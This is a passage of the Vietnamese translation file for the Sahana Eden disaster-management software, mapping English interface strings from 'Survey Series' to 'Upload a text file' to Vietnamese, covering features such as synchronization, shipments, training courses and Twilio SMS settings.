sát', 'Survey Series': 'Chuỗi khảo sát', 'Survey Template added': 'Thêm mẫu Khảo sát', 'Survey Templates': 'Mẫu khảo sát', 'Swiss Francs': 'Frăng Thụy Sỹ', 'Switch to 3D': 'Chuyển sang 3D', 'Symbologies': 'Các biểu tượng', 'Symbology Details': 'Chi tiết biểu tượng', 'Symbology added': 'Thêm biểu tượng', 'Symbology deleted': 'Xóa biểu tượng', 'Symbology removed from Layer': 'Bỏ biểu tượng khỏi lớp', 'Symbology updated': 'Cập nhật biểu tượng', 'Symbology': 'Biểu tượng', 'Sync Conflicts': 'Xung đột khi đồng bộ hóa', 'Sync Now': 'Đồng bộ hóa ngay bây giờ', 'Sync Partners': 'Đối tác đồng bộ', 'Sync Schedule': 'Lịch đồng bộ', 'Sync process already started on ': 'Quá trình đồng bộ đã bắt đầu lúc ', 'Synchronization Job': 'Chức năng Đồng bộ hóa', 'Synchronization Log': 'Danh mục Đồng bộ hóa', 'Synchronization Schedule': 'Kế hoạch Đồng bộ hóa', 'Synchronization Settings': 'Các cài đặt Đồng bộ hóa', 'Synchronization allows you to share data that you have with others and update your own database with latest data from other peers. 
This page provides you with information about how to use the synchronization features of Sahana Eden': 'Đồng bộ hóa cho phép bạn chia sẻ dữ liệu và cập nhật cơ sở dữ liệu với các máy khác. Trang này hướng dẫn bạn cách sử dụng các tính năng đồng bộ của Sahana Eden', 'Synchronization currently active - refresh page to update status.': 'Đồng bộ hóa đang chạy - làm mới trang để cập nhật tình trạng', 'Synchronization mode': 'Chế độ đồng bộ hóa', 'Synchronization not configured.': 'Chưa thiết đặt đồng bộ hóa', 'Synchronization settings updated': 'Các cài đặt đồng bộ hóa được cập nhật', 'Synchronization': 'Đồng bộ hóa', 'Syncronization History': 'Lịch sử đồng bộ hóa', 'System keeps track of all Volunteers working in the disaster region. It captures not only the places where they are active, but also captures information on the range of services they are providing in each area.': 'Hệ thống theo sát quá trình làm việc của các tình nguyện viên trong khu vực thiên tai. Hệ thống nắm bắt không chỉ vị trí hoạt động mà còn cả thông tin về các dịch vụ đang cung cấp trong mỗi khu vực', 'THOUSAND_SEPARATOR': 'Định dạng hàng nghìn', 'TMS Layer': 'Lớp TMS', 'TO': 'TỚI', 'Table Permissions': 'Quyền truy cập bảng', 'Table name of the resource to synchronize': 'Tên bảng của nguồn lực cần đồng bộ hóa', 'Table': 'Bảng thông tin', 'Tablename': 'Tên bảng', 'Tags': 'Các thẻ', 'Task Details': 'Các chi tiết nhiệm vụ', 'Task List': 'Danh sách Nhiệm vụ', 'Task added': 'Nhiệm vụ được thêm vào', 'Task deleted': 'Nhiệm vụ đã xóa', 'Task updated': 'Nhiệm vụ được cập nhật', 'Task': 'Nhiệm vụ', 'Tasks': 'Nhiệm vụ', 'Team Description': 'Mô tả về Đội/Nhóm', 'Team Details': 'Thông tin về Đội/Nhóm', 'Team ID': 'Mã Đội/Nhóm', 'Team Leader': 'Đội trưởng', 'Team Members': 'Thành viên Đội/Nhóm', 'Team Name': 'Tên Đội/Nhóm', 'Team Type': 'Loại hình Đội/Nhóm', 'Team added': 'Đội/ Nhóm đã thêm', 'Team deleted': 'Đội/ Nhóm đã xóa', 'Team updated': 'Đội/ Nhóm đã cập nhật', 'Team': 'Đội', 'Teams': 'Đội/Nhóm', 'Technical Disaster': 'Thảm họa liên quan đến công nghệ', 'Telephony': 'Đường điện thoại', 'Tells GeoServer to do MetaTiling which reduces the number of duplicate labels.': 'Yêu cầu GeoServer làm MetaTiling để giảm số nhãn bị lặp', 'Template Name': 'Tên Biểu mẫu', 'Template Section Details': 'Chi tiết Mục Biểu mẫu', 'Template Section added': 'Mục Biểu mẫu được thêm', 'Template Section deleted': 'Mục Biểu mẫu đã xóa', 'Template Section updated': 'Mục Biểu mẫu được cập nhật', 'Template Sections': 'Các Mục Biểu mẫu', 'Template Summary': 'Tóm tắt Biểu mẫu', 'Template': 'Biểu mẫu', 'Templates': 'Biểu mẫu', 'Term for the fifth-level within-country administrative division (e.g. a voting or postcode subdivision). This level is not often used.': 'Khái niệm về sự phân chia hành chính trong nước cấp thứ năm (ví dụ như sự phân chia bầu cử hay mã bưu điện). Mức này thường ít được dùng', 'Term for the fourth-level within-country administrative division (e.g. Village, Neighborhood or Precinct).': 'Khái niệm về sự phân chia hành chính cấp thứ tư bên trong quốc gia (ví dụ như làng, hàng xóm hay bản)', 'Term for the primary within-country administrative division (e.g. State or Province).': 'Khái niệm về sự phân chia hành chính trong nước cấp một (ví dụ như Bang hay Tỉnh)', 'Term for the secondary within-country administrative division (e.g. District or County).': 'Khái niệm về sự phân chia hành chính trong nước cấp thứ hai (ví dụ như quận huyện hay thị xã)', 'Term for the third-level within-country administrative division (e.g. 
City or Town).': 'Khái niệm về sự phân chia hành chính trong nước cấp thứ ba (ví dụ như thành phố hay thị trấn)', 'Term': 'Loại hợp đồng', 'Terms of Service:': 'Điều khoản Dịch vụ:', 'Terrorism': 'Khủng bố', 'Tertiary Server (Optional)': 'Máy chủ Cấp ba (Tùy chọn)', 'Text Color for Text blocks': 'Màu văn bản cho khối văn bản', 'Text': 'Từ khóa', 'Thank you for your approval': 'Cảm ơn bạn vì sự phê duyệt', 'Thank you, the submission%(br)shas been declined': 'Cảm ơn bạn, lời đề nghị %(br)s đã bị từ chối', 'Thanks for your assistance': 'Cám ơn sự hỗ trợ của bạn', 'The "query" is a condition like "db.table1.field1==\'value\'". Something like "db.table1.field1 == db.table2.field2" results in a SQL JOIN.': '"Câu hỏi" là một điều kiện có dạng "db.bảng1.trường1==\'giá trị\'". Bất kỳ cái gì có dạng "db.bảng1.trường1 == db.bảng2.trường2" đều có kết quả là một SQL JOIN.', 'The Area which this Site is located within.': 'Khu vực có chứa Địa điểm này', 'The Assessment Module stores assessment templates and allows responses to assessments for specific events to be collected and analyzed': 'Mô đun Khảo sát Đánh giá chứa các biểu mẫu khảo sát đánh giá và cho phép thu thập và phân tích các phản hồi đối với khảo sát đánh giá cho các sự kiện cụ thể', 'The Author of this Document (optional)': 'Tác giả của Tài liệu này (tùy chọn)', 'The Bin in which the Item is being stored (optional).': 'Ngăn/ Khu vực chứa hàng (tùy chọn)', 'The Current Location of the Person/Group, which can be general (for Reporting) or precise (for displaying on a Map). Enter a few characters to search from available locations.': 'Địa điểm hiện tại của Người/ Nhóm, có thể là chung chung (dùng để Báo cáo) hoặc chính xác (dùng để thể hiện trên Bản đồ). Nhập các ký tự để tìm kiếm từ các địa điểm hiện có.', 'The Email Address to which approval requests are sent (normally this would be a Group mail rather than an individual). If the field is blank then requests are approved automatically if the domain matches.': 'Địa chỉ thư điện tử để gửi các yêu cầu phê duyệt (thông thường địa chỉ này là một nhóm các địa chỉ chứ không phải là các địa chỉ đơn lẻ). Nếu trường này bị bỏ trống thì các yêu cầu sẽ được tự động chấp thuận nếu miền phù hợp.', 'The Incident Reporting System allows the General Public to Report Incidents & have these Tracked.': 'Hệ thống Báo cáo Sự việc cho phép công chúng báo cáo sự việc và theo dõi các sự việc này.', 'The Location the Person has come from, which can be general (for Reporting) or precise (for displaying on a Map). Enter a few characters to search from available locations.': 'Địa điểm xuất phát của Người, có thể chung chung (dùng cho Báo cáo) hay chính xác (dùng để thể hiện trên Bản đồ). Nhập một số ký tự để tìm kiếm từ các địa điểm đã có.', 'The Location the Person is going to, which can be general (for Reporting) or precise (for displaying on a Map). Enter a few characters to search from available locations.': 'Địa điểm mà Người chuẩn bị đến, có thể là chung chung (dùng cho Báo cáo) hay chính xác (dùng để thể hiện trên Bản đồ). Nhập một số ký tự để tìm kiếm từ các địa điểm đã có.', 'The Media Library provides a catalog of digital media.': 'Thư viện Đa phương tiện cung cấp một danh mục các phương tiện số.', 'The Messaging Module is the main communications hub of the Sahana system. It is used to send alerts and/or messages using SMS & Email to various groups and individuals before, during and after a disaster.': 'Chức năng nhắn tin là trung tâm thông tin chính của hệ thống Sahana. 
Chức năng này được sử dụng để gửi cảnh báo và/ hoặc tin nhắn dạng SMS và email tới các nhóm và cá nhân trước, trong và sau thảm họa.', 'The Organization Registry keeps track of all the relief organizations working in the area.': 'Cơ quan đăng ký Tổ chức theo dõi tất cả các tổ chức cứu trợ đang hoạt động trong khu vực.', 'The Organization this record is associated with.': 'Tổ chức được ghi liên kết với.', 'The Role this person plays within this hospital.': 'Vai trò của người này trong bệnh viện', 'The Tracking Number %s is already used by %s.': 'Số Theo dõi %s đã được sử dụng bởi %s.', 'The URL for the GetCapabilities page of a Web Map Service (WMS) whose layers you want available via the Browser panel on the Map.': 'URL cho trang GetCapabilities của một Dịch vụ Bản đồ Mạng (WMS) có các lớp mà bạn muốn có thông qua bảng Trình duyệt trên Bản đồ.', 'The URL of your web gateway without the post parameters': 'URL của cổng mạng của bạn mà không có các thông số điện tín', 'The URL to access the service.': 'URL để truy cập dịch vụ.', 'The answers are missing': 'Chưa có các câu trả lời', 'The area is': 'Khu vực là', 'The attribute which is used for the title of popups.': 'Thuộc tính được sử dụng cho tiêu đề của các cửa sổ tự động hiển thị.', 'The attribute within the KML which is used for the title of popups.': 'Thuộc tính trong KML được sử dụng cho tiêu đề của các cửa sổ tự động hiển thị.', 'The attribute(s) within the KML which are used for the body of popups. (Use a space between attributes)': '(Các) thuộc tính trong KML được sử dụng cho phần nội dung của các cửa sổ tự động hiển thị. (Sử dụng dấu cách giữa các thuộc tính)', 'The body height (crown to heel) in cm.': 'Chiều cao của phần thân (từ đầu đến chân) tính theo đơn vị cm.', 'The contact person for this organization.': 'Người chịu trách nhiệm liên lạc cho tổ chức này', 'The facility where this position is based.': 'Bộ phận mà vị trí này trực thuộc', 'The first or only name of the person (mandatory).': 'Tên (bắt buộc phải điền).', 'The following %s have been added': '%s dưới đây đã được thêm vào', 'The following %s have been updated': '%s dưới đây đã được cập nhật', 'The form of the URL is http://your/web/map/service?service=WMS&request=GetCapabilities where your/web/map/service stands for the URL path to the WMS.': 'Dạng URL là http://your/web/map/service?service=WMS&request=GetCapabilities, trong đó your/web/map/service là đường dẫn URL đến WMS.', 'The hospital this record is associated with.': 'Bệnh viện lưu hồ sơ này', 'The language you wish the site to be displayed in.': 'Ngôn ngữ bạn muốn để hiển thị trên trang web', 'The length is': 'Chiều dài là', 'The list of Brands are maintained by the Administrators.': 'Danh sách các Nhãn hàng do Quản trị viên quản lý.', 'The list of Catalogs are maintained by the Administrators.': 'Danh sách các Danh mục do Quản trị viên quản lý.', 'The list of Item categories are maintained by the Administrators.': 'Danh sách category hàng hóa được quản trị viên quản lý', 'The map will be displayed initially with this latitude at the center.': 'Bản đồ sẽ được thể hiện đầu tiên với vĩ độ này tại địa điểm trung tâm.', 'The map will be displayed initially with this longitude at the center.': 'Bản đồ sẽ được thể hiện đầu tiên với kinh độ này tại địa điểm trung tâm.', 'The minimum number of features to form a cluster.': 'Các đặc điểm tối thiểu để hình thành một nhóm.', 'The name to be used when calling for or directly addressing the person (optional).': 'Tên được sử dụng khi gọi người này (tùy chọn).', 
'The number geographical units that may be part of the aggregation': 'Số đơn vị địa lý có thể là một phần của tổ hợp', 'The number of Units of Measure of the Alternative Items which is equal to One Unit of Measure of the Item': 'Số Đơn vị Đo của Các mặt hàng thay thế bằng với Một Đơn vị Đo của Mặt hàng đó', 'The number of aggregated records': 'Số bản lưu đã được tổng hợp', 'The number of pixels apart that features need to be before they are clustered.': 'Số điểm ảnh ngoài mà các đặc điểm cần trước khi được nhóm', 'The number of tiles around the visible map to download. Zero means that the 1st page loads faster, higher numbers mean subsequent panning is faster.': 'Số lớp để tải về quanh bản đồ được thể hiện. Giá trị 0 nghĩa là trang đầu tiên tải nhanh hơn, các con số cao hơn nghĩa là việc quét sau nhanh hơn.', 'The person reporting about the missing person.': 'Người báo cáo về người mất tích', 'The post variable containing the phone number': 'Biến POST chứa số điện thoại', 'The post variable on the URL used for sending messages': 'Biến POST trên URL được dùng để gửi tin nhắn', 'The post variables other than the ones containing the message and the phone number': 'Các biến POST khác ngoài các biến chứa tin nhắn và số điện thoại', 'The serial port at which the modem is connected - /dev/ttyUSB0, etc on linux and com1, com2, etc on Windows': 'Cổng nối tiếp nơi mô đem được kết nối - /dev/ttyUSB0, v.v. trên linux và com1, com2, v.v. trên Windows', 'The server did not receive a timely response from another server that it was accessing to fill the request by the browser.': 'Máy chủ không nhận được một phản hồi kịp thời từ một máy chủ khác khi đang truy cập để hoàn tất yêu cầu bằng bộ trình duyệt.', 'The server received an incorrect response from another server that it was accessing to fill the request by the browser.': 'Máy chủ đã nhận được một phản hồi sai từ một máy chủ khác khi đang truy cập để hoàn tất yêu cầu bằng bộ trình duyệt.', 'The simple policy allows anonymous users to Read & registered users to Edit. The full security policy allows the administrator to set permissions on individual tables or records - see models/zzz.py.': 'Chính sách đơn giản cho phép người dùng ẩn danh được Đọc và người dùng đã đăng ký được Chỉnh sửa. Chính sách bảo mật đầy đủ cho phép quản trị viên thiết lập phân quyền trên từng bảng hoặc bản ghi riêng lẻ - xem models/zzz.py.', 'The staff responsibile for Facilities can make Requests for assistance. Commitments can be made against these Requests however the requests remain open until the requestor confirms that the request is complete.': 'Cán bộ chịu trách nhiệm về Các cơ sở có thể đưa ra Yêu cầu trợ giúp. 
Các cam kết có thể được đưa ra đối với những Yêu cầu này tuy nhiên các yêu cầu này phải để mở cho đến khi người yêu cầu xác nhận yêu cầu đã hoàn tất.', 'The synchronization module allows the synchronization of data resources between Sahana Eden instances.': 'Mô đun đồng bộ hóa cho phép đồng bộ hóa nguồn dữ liệu giữa các phiên bản Sahana Eden.', 'The system supports 2 projections by default:': 'Hệ thống hỗ trợ mặc định 2 phép chiếu:', 'The token associated with this application on': 'Mã thông báo liên quan đến ứng dụng này trên', 'The unique identifier which identifies this instance to other instances.': 'Mã định danh duy nhất giúp nhận dạng hệ thống này với các hệ thống khác.', 'The uploaded Form is unreadable, please do manual data entry.': 'Mẫu được tải không thể đọc được, vui lòng nhập dữ liệu thủ công', 'The weight in kg.': 'Trọng lượng tính theo đơn vị kg.', 'Theme Data deleted': 'Dữ liệu Chủ đề đã xóa', 'Theme Data updated': 'Dữ liệu Chủ đề đã cập nhật', 'Theme Data': 'Dữ liệu Chủ đề', 'Theme Details': 'Chi tiết Chủ đề', 'Theme Layer': 'Lớp Chủ đề', 'Theme Sectors': 'Lĩnh vực của Chủ đề', 'Theme added': 'Chủ đề được thêm vào', 'Theme deleted': 'Chủ đề đã xóa', 'Theme removed': 'Chủ đề đã loại bỏ', 'Theme updated': 'Chủ đề đã cập nhật', 'Theme': 'Chủ đề', 'Themes': 'Chủ đề', 'There are multiple records at this location': 'Có nhiều bản lưu tại địa điểm này', 'There is a problem with your file.': 'Có vấn đề với tệp tin của bạn.', 'There is insufficient data to draw a chart from the questions selected': 'Không có đủ dữ liệu để vẽ biểu đồ từ câu hỏi đã chọn', 'There is no address for this person yet. Add new address.': 'Chưa có địa chỉ về người này. Hãy thêm địa chỉ.', 'There was a problem, sorry, please try again later.': 'Đã có vấn đề, xin lỗi, vui lòng thử lại sau.', 'These are settings for Inbound Mail.': 'Đây là những cài đặt cho Hộp thư đến.', 'These are the Incident Categories visible to normal End-Users': 'Đây là những Nhóm Sự kiện hiển thị cho Người dùng Cuối cùng thông thường.', 'These are the filters being used by the search.': 'Đây là những bộ lọc sử dụng cho tìm kiếm.', 'These need to be added in Decimal Degrees.': 'Các giá trị này cần được nhập theo Độ thập phân.', 'They': 'Người ta', 'This Group has no Members yet': 'Hiện không có hội viên nào được đăng ký', 'This Team has no Members yet': 'Hiện không có hội viên nào được đăng ký', 'This adjustment has already been closed.': 'Điều chỉnh này đã đóng.', 'This email-address is already registered.': 'Địa chỉ email này đã được đăng ký.', 'This form allows the administrator to remove a duplicate location.': 'Mẫu này cho phép quản trị viên xóa bỏ các địa điểm trùng', 'This is appropriate if this level is under construction. To prevent accidental modification after this level is complete, this can be set to False.': 'Lựa chọn này phù hợp nếu cấp độ này đang được xây dựng. 
Để không vô tình chỉnh sửa sau khi hoàn tất cấp độ này, lựa chọn này có thể được đặt ở giá trị Sai.', 'This is normally edited using the Widget in the Style Tab in the Layer Properties on the Map.': 'Điều này thông thường được chỉnh sửa sử dụng Công cụ trong Mục Kiểu dáng trong Các đặc trưng của Lớp trên Bản đồ.', 'This is the full name of the language and will be displayed to the user when selecting the template language.': 'Đây là tên đầy đủ của ngôn ngữ và sẽ được thể hiện với người dùng khi lựa chọn ngôn ngữ.', 'This is the name of the parsing function used as a workflow.': 'Đây là tên của chức năng phân tích cú pháp được sử dụng như là một chuỗi công việc.', 'This is the name of the username for the Inbound Message Source.': 'Đây là tên của người dùng cho Nguồn tin nhắn đến.', 'This is the short code of the language and will be used as the name of the file. This should be the ISO 639 code.': 'Đây là mã ngắn gọn của ngôn ngữ và sẽ được sử dụng làm tên của tệp tin. Mã này nên theo mã ISO 639.', 'This is the way to transfer data between machines as it maintains referential integrity.': 'Đây là cách truyền dữ liệu giữa các máy vì nó bảo toàn tham chiếu', 'This job has already been finished successfully.': 'Công việc đã được thực hiện thành công.', 'This level is not open for editing.': 'Cấp độ này không cho phép chỉnh sửa.', 'This might be due to a temporary overloading or maintenance of the server.': 'Điều này có lẽ là do máy chủ đang quá tải hoặc đang được bảo trì.', 'This module allows Warehouse Stock to be managed, requested & shipped between the Warehouses and Other Inventories': 'Chức năng này giúp việc quản lý, đặt yêu cầu và di chuyển hàng lưu trữ giữa các kho hàng và các vị trí lưu trữ khác trong kho', 'This resource cannot be displayed on the map!': 'Nguồn lực này không thể hiện trên bản đồ!', 'This resource is already configured for this repository': 'Nguồn lực này đã được thiết lập cấu hình cho kho hàng này', 'This role can not be assigned to users.': 'Chức năng không thể cấp cho người sử dụng', 'This screen allows you to upload a collection of photos to the server.': 'Màn hình này cho phép bạn đăng tải một bộ sưu tập hình ảnh lên máy chủ.', 'This shipment contains %s items': 'Lô hàng này chứa %s mặt hàng', 'This shipment contains one item': 'Lô hàng này chứa một mặt hàng', 'This shipment has already been received & subsequently canceled.': 'Lô hàng này đã được nhận & về sau bị hủy.', 'This shipment has already been received.': 'Lô hàng này đã được nhận.', 'This shipment has already been sent.': 'Lô hàng này đã được gửi.', 'This shipment has not been received - it has NOT been canceled because it can still be edited.': 'Lô hàng này chưa được nhận - KHÔNG bị hủy vì vẫn có thể điều chỉnh.', 'This shipment has not been returned.': 'Lô hàng này chưa được trả lại.', 'This shipment has not been sent - it cannot be returned because it can still be edited.': 'Lô hàng này chưa được gửi - không thể trả lại vì vẫn có thể điều chỉnh.', 'This shipment has not been sent - it has NOT been canceled because it can still be edited.': 'Lô hàng này chưa được gửi - KHÔNG bị hủy vì vẫn có thể điều chỉnh.', 'This should be an export service URL': 'Đây phải là URL của dịch vụ xuất dữ liệu', 'Thunderstorm': 'Giông bão', 'Thursday': 'Thứ Năm', 'Ticket Details': 'Chi tiết Ticket', 'Ticket Viewer': 'Trình xem Ticket', 'Ticket deleted': 'Đã xóa Ticket', 'Ticket': 'Vé', 'Tickets': 'Vé', 'Tiled': 'Chia ô', 'Time Actual': 'Thời gian thực tế', 'Time Estimate': 'Ước lượng thời gian', 'Time Estimated': 'Thời gian dự 
đoán', 'Time Frame': 'Khung thời gian', 'Time In': 'Thời điểm vào', 'Time Log Deleted': 'Lịch trình thời gian đã xóa', 'Time Log Updated': 'Lịch trình thời gian đã cập nhật', 'Time Log': 'Lịch trình thời gian', 'Time Logged': 'Thời gian truy nhập', 'Time Out': 'Thời gian thoát', 'Time Question': 'Câu hỏi thời gian', 'Time Taken': 'Thời gian đã dùng', 'Time of Request': 'Thời gian yêu cầu', 'Time': 'Thời gian', 'Timeline': 'Dòng thời gian', 'Title to show for the Web Map Service panel in the Tools panel.': 'Tiêu đề thể hiện với bảng Dịch vụ Bản đồ Mạng trong bảng Công cụ.', 'Title': 'Tiêu đề', 'To Organization': 'Tới Tổ chức', 'To Person': 'Tới Người', 'To Warehouse/Facility/Office': 'Tới Nhà kho/Bộ phận/Văn phòng', 'To begin the sync process, click the button on the right => ': 'Nhấp chuột vào nút bên phải để kích hoạt quá trình đồng bộ', 'To edit OpenStreetMap, you need to edit the OpenStreetMap settings in your Map Config': 'Để chỉnh sửa OpenStreetMap, bạn cần chỉnh sửa cài đặt OpenStreetMap trong cài đặt cấu hình bản đồ của bạn.', 'To variable': 'Tới biến số', 'To': 'Tới', 'Tools and Guidelines Development': 'Xây dựng các hướng dẫn và công cụ', 'Tools': 'Công cụ', 'Tornado': 'Lốc xoáy', 'Total # of Target Beneficiaries': 'Tổng số đối tượng hưởng lợi mục tiêu', 'Total Annual Budget': 'Tổng ngân sách hàng năm', 'Total Cost per Megabyte': 'Tổng chi phí cho mỗi Megabyte', 'Total Cost': 'Giá tổng', 'Total Funding Amount': 'Tổng số tiền hỗ trợ', 'Total Locations': 'Tổng các vị trí', 'Total Persons': 'Tổng số người', 'Total Recurring Costs': 'Tổng chi phí định kỳ', 'Total Value': 'Giá trị tổng', 'Total number of beds in this hospital. Automatically updated from daily reports.': 'Tổng số giường bệnh trong bệnh viện này. Tự động cập nhật từ các báo cáo hàng ngày.', 'Total number of houses in the area': 'Tổng số nóc nhà trong khu vực', 'Total number of schools in affected area': 'Số lượng trường học trong khu vực chịu ảnh hưởng thiên tai', 'Total': 'Tổng', 'Tourist Group': 'Nhóm khách du lịch', 'Tracing': 'Đang tìm kiếm', 'Track Shipment': 'Theo dõi lô hàng', 'Track with this Person?': 'Theo dõi Người này?', 'Track': 'Dấu vết', 'Trackable': 'Có thể theo dõi được', 'Tracking and analysis of Projects and Activities.': 'Giám sát và phân tích Dự án và Hoạt động', 'Traffic Report': 'Báo cáo giao thông', 'Training (Count)': 'Tập huấn (Số lượng)', 'Training Course Catalog': 'Danh mục khóa tập huấn', 'Training Courses': 'Khóa tập huấn', 'Training Details': 'Chi tiết về khóa tập huấn', 'Training Event Details': 'Chi tiết về khóa tập huấn', 'Training Event added': 'Khóa tập huấn được thêm vào', 'Training Event deleted': 'Khóa tập huấn đã xóa', 'Training Event updated': 'Khóa tập huấn đã cập nhật', 'Training Event': 'Khóa tập huấn', 'Training Events': 'Khóa tập huấn', 'Training Facility': 'Đơn vị đào tạo', 'Training Hours (Month)': 'Thời gian tập huấn (Tháng)', 'Training Hours (Year)': 'Thời gian tập huấn (Năm)', 'Training Report': 'Tập huấn', 'Training added': 'Tập huấn được thêm vào', 'Training deleted': 'Tập huấn đã xóa', 'Training of Master Trainers/ Trainers': 'Tập huấn Giảng viên/ Giảng viên nguồn', 'Training Sector': 'Lĩnh vực tập huấn', 'Training updated': 'Tập huấn đã cập nhật', 'Training': 'Tập huấn', 'Trainings': 'Tập huấn', 'Transfer Ownership To (Organization/Branch)': 'Chuyển Quyền sở hữu cho (Tổ chức/ Chi nhánh)', 'Transfer Ownership': 'Chuyển Quyền sở hữu', 'Transfer': 'Chuyển giao', 'Transit Status': 'Tình trạng chuyển tiếp', 'Transit': 'Chuyển tiếp', 'Transitional Shelter Construction': 'Xây dựng nhà 
tạm', 'Transitional Shelter': 'Nhà tạm', 'Translate': 'Dịch', 'Translated File': 'File được dịch', 'Translation Functionality': 'Chức năng Dịch', 'Translation': 'Dịch', 'Transparent?': 'Trong suốt?', 'Transportation Required': 'Cần vận chuyển', 'Transported By': 'Đơn vị vận chuyển', 'Tropical Storm': 'Bão nhiệt đới', 'Tropo Messaging Token': 'Mã thông báo tin nhắn Tropo', 'Tropo settings updated': 'Cài đặt Tropo được cập nhật', 'Truck': 'Xe tải', 'Try checking the URL for errors, maybe it was mistyped.': 'Kiểm tra đường dẫn URL xem có lỗi không, có thể đường dẫn bị gõ sai.', 'Try hitting refresh/reload button or trying the URL from the address bar again.': 'Thử nhấn nút làm lại/tải lại hoặc thử lại URL từ trên thanh địa chỉ.', 'Try refreshing the page or hitting the back button on your browser.': 'Thử tải lại trang hoặc nhấn nút trở lại trên trình duyệt của bạn.', 'Tsunami': 'Sóng thần', 'Twilio SMS InBox': 'Hộp thư đến SMS twilio', 'Twilio SMS Inbox empty. ': 'Hộp thư đến Twilio trống.', 'Twilio SMS Inbox': 'Hộp thư đến Twilio', 'Twilio SMS Settings': 'Cài đặt SMS twilio', 'Twilio SMS deleted': 'Tin nhắn Twilio đã xóa', 'Twilio SMS updated': 'Tin nhắn Twilio được cập nhật', 'Twilio SMS': 'Tin nhắn Twilio', 'Twilio Setting Details': 'Chi tiết cài đặt Twilio', 'Twilio Setting added': 'Cài đặt Twilio được thêm vào', 'Twilio Setting deleted': 'Cài đặt Twilio đã xóa', 'Twilio Settings': 'Cài đặt Twilio', 'Twilio settings updated': 'Cài đặt Twilio được cập nhật', 'Twitter ID or #hashtag': 'Tên đăng nhập Twitter hay từ hay chuỗi các ký tự bắt đầu bằng dấu # (#hashtag)', 'Twitter Settings': 'Cài đặt Twitter', 'Type of Transport': 'Loại phương tiện giao thông', 'Type of adjustment': 'Loại hình điều chỉnh', 'Type': 'Loại', 'Types of Activities': 'Các loại hình Hoạt động', 'Types': 'Các loại', 'UPDATE': 'CẬP NHẬT', 'URL for the twilio API.': 'URL cho twilio API.', 'URL of the default proxy server to connect to remote repositories (if required). If only some of the repositories require the use of a proxy server, you can configure this in the respective repository configurations.': 'URL của máy chủ trung chuyển mặc định để kết nối với các kho hàng ở khu vực xa (nếu cần thiết). 
Nếu chỉ có một số kho hàng cần một máy chủ trung chuyển sử dụng thì bạn có thể tạo cấu hình cho máy này tương ứng với cấu hình của kho hàng.', 'URL of the proxy server to connect to the repository (leave empty for default proxy)': 'URL của máy chủ trung chuyển để kết nối với kho hàng (để trống với phần ủy nhiệm mặc định)', 'URL to a Google Calendar to display on the project timeline.': 'URL đến Lịch Google để thể hiện dòng thời gian của dự án.', 'UTC Offset': 'Độ xê dịch giờ quốc tế', 'Un-Repairable': 'Không thể sửa chữa', 'Unable to find sheet %(sheet_name)s in uploaded spreadsheet': 'Không thể tìm thấy bảng %(sheet_name)s trong bảng tính đã đăng tải', 'Unable to open spreadsheet': 'Không thể mở được bảng tính', 'Unable to parse CSV file or file contains invalid data': 'Không thể cài đặt cú pháp cho file CSV hoặc file chứa dữ liệu không hợp lệ', 'Unable to parse CSV file!': 'Không thể đọc file CSV', 'Unassigned': 'Chưa được điều động', 'Under 5': 'Dưới 5', 'Under which condition a local record shall be updated if it also has been modified locally since the last synchronization': 'Trong điều kiện nào thì một bản lưu nội bộ sẽ được cập nhật nếu bản lưu này cũng được điều chỉnh trong nội bộ kể từ lần đồng bộ hóa cuối cùng', 'Under which conditions local records shall be updated': 'Trong những điều kiện nào thì các bản lưu nội bộ sẽ được cập nhật', 'Unidentified': 'Không nhận dạng được', 'Unique Locations': 'Các địa điểm duy nhất', 'Unique identifier which THIS repository identifies itself with when sending synchronization requests.': 'Ký hiệu nhận dạng duy nhất để kho hàng NÀY nhận dạng chính nó khi gửi các đề nghị đồng bộ hóa.', 'Unit Cost': 'Đơn giá', 'Unit Short Code for e.g. m for meter.': 'Viết tắt các đơn vị, ví dụ m viết tắt của mét', 'Unit Value': 'Thành tiền', 'Unit added': 'Đã thêm đơn vị', 'Unit of Measure': 'Đơn vị đo', 'Unit updated': 'Đơn vị được cập nhật', 'Unit': 'Đơn vị', 'United States Dollars': 'Đô La Mỹ', 'Units': 'Các đơn vị', 'University / College': 'Đại học / Cao đẳng', 'Unknown Locations': 'Địa điểm không xác định', 'Unknown question code': 'Mã câu hỏi chưa được biết đến', 'Unknown': 'Chưa xác định', 'Unloading': 'Đang gỡ ra', 'Unselect to disable the modem': 'Thôi chọn để tạm ngừng hoạt động của mô đem', 'Unselect to disable this API service': 'Thôi chọn để tạm ngừng dịch vụ API này', 'Unselect to disable this SMTP service': 'Thôi chọn để tạm ngừng dịch vụ SMTP này', 'Unsent': 'Chưa được gửi', 'Unspecified': 'Không rõ', 'Unsupported data format': 'Định dạng dữ liệu không được hỗ trợ', 'Unsupported method': 'Phương pháp không được hỗ trợ', 'Update Map': 'Cập nhật Bản đồ', 'Update Master file': 'Cập nhật tệp tin Gốc', 'Update Method': 'Phương pháp Cập nhật', 'Update Policy': 'Chính sách Cập nhật', 'Update Report': 'Cập nhật báo cáo', 'Update Request': 'Cập nhật Yêu cầu', 'Update Service Profile': 'Cập nhật hồ sơ đăng ký dịch vụ', 'Update Status': 'Cập nhật Tình trạng', 'Update Task Status': 'Cập nhật tình trạng công việc ', 'Update this entry': 'Cập nhật hồ sơ này', 'Updated By': 'Được cập nhật bởi', 'Upload .CSV': 'Tải lên .CSV', 'Upload Completed Assessment Form': 'Tải lên Mẫu đánh giá đã hoàn thiện', 'Upload Format': 'Tải định dạng', 'Upload Photos': 'Tải lên Hình ảnh', 'Upload Scanned OCR Form': 'Tải mẫu scan OCR', 'Upload Web2py portable build as a zip file': 'Tải lên Web2py như một tệp nén', 'Upload a Question List import file': 'Tải lên một tệp tin được chiết xuất chứa Danh sách các câu hỏi', 'Upload a Spreadsheet': 'Tải một bảng tính lên', 'Upload a text file 
